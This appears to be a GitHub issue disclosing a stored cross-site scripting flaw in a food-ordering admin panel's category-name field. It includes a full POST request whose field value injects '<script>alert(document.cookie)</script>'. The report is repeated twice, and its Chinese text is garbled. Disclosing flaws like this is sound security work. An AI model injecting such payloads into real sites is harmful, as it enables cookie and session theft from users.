Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
after logged as admin ,thre is a store xss at the information of goods the attacked url: http://127.0.0.1/waimai/admin.php/Foodcat/editsave the fcname is attacked post:
-----------------------------1966097642872192705219418513 Content-Disposition: form-data; name="fcname"
ç¾�å�³æ±�å ¡<script>alert(document.cookie)</script> -----------------------------1966097642872192705219418513 Content-Disposition: form-data; name="fcid"
19 -----------------------------1966097642872192705219418513 Content-Disposition: form-data; name="fcsort"
0 -----------------------------1966097642872192705219418513--
The text was updated successfully, but these errors were encountered:
No branches or pull requests
after logged as admin ,thre is a store xss at the information of goods
the attacked url: http://127.0.0.1/waimai/admin.php/Foodcat/editsave
the fcname is attacked
post:
-----------------------------1966097642872192705219418513
Content-Disposition: form-data; name="fcname"
ç¾�å�³æ±�å ¡<script>alert(document.cookie)</script>
-----------------------------1966097642872192705219418513
Content-Disposition: form-data; name="fcid"
19
-----------------------------1966097642872192705219418513
Content-Disposition: form-data; name="fcsort"
0
-----------------------------1966097642872192705219418513--
The text was updated successfully, but these errors were encountered: